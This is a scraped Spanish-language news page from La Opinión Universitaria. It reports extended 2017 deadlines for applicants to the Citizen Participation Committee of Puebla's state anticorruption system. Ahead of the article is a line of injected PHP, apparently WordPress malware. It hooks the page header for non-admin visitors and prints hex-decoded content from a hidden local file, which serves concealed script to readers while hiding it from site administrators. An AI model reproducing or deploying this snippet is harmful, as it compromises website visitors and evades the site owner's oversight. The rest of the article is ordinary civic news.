if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Rectores amplían fecha para recibir propuestas para crear el Sistema Anticorrupción – La Opinión Universitaria La Opinión Universitaria
Menu

Rectores amplían fecha para recibir propuestas para crear el Sistema Anticorrupción

Con motivo de los sismos ocurridos en días pasados y, a partir de la emergencia, surgió la necesidad de atender cuestiones urgentes y prioritarias por parte de la sociedad. De igual forma, hay documentos contemplados en el expediente a presentar por parte de los postulantes al Comité de Participación Ciudadana, que solo pueden obtenerse en oficinas públicas, mismas que también han tenido ajustes operativos debido a los temblores ya mencionados.
Es por ello que, a fin de permitir que las personas interesadas en postularse como integrantes del Comité de Participación Ciudadana del Sistema Estatal Anticorrupción de Puebla cuenten con el tiempo suficiente de obtener documentos necesarios para integrar sus expedientes, se amplían los plazos establecidos por la convocatoria publicada el 12 de septiembre de 2017, por la Comisión de Selección del Comité de Participación Ciudadana de la siguiente manera:
Recepción de documentos: Hasta las dieciocho horas del diecisiete de octubre de dos mil diecisiete.
Revisión de expedientes y elección de los postulantes que pasan a la ronda de entrevistas: del dieciocho al veintidós de octubre de dos mil diecisiete.
Emisión de la lista de postulantes que pasarán a la fase de entrevista: veintitrés de octubre de dos mil diecisiete.
Recepción de preguntas por parte de organismos de la sociedad civil para formularse a los postulantes, previo sorteo: del veintitrés al veintisiete de octubre de dos mil diecisiete. Estas preguntas serán recibidas a través del portal web de la Comisión.
Entrevistas individuales con los postulantes seleccionados: se llevarán a cabo el treinta y treinta y uno de octubre de dos mil diecisiete, previo citatorio.
Emisión de la lista de candidatos elegidos como integrantes del Comité de Participación Ciudadana: siete de noviembre de dos mil diecisiete.

  • No comments

    Deja una respuesta

    Tweets recientes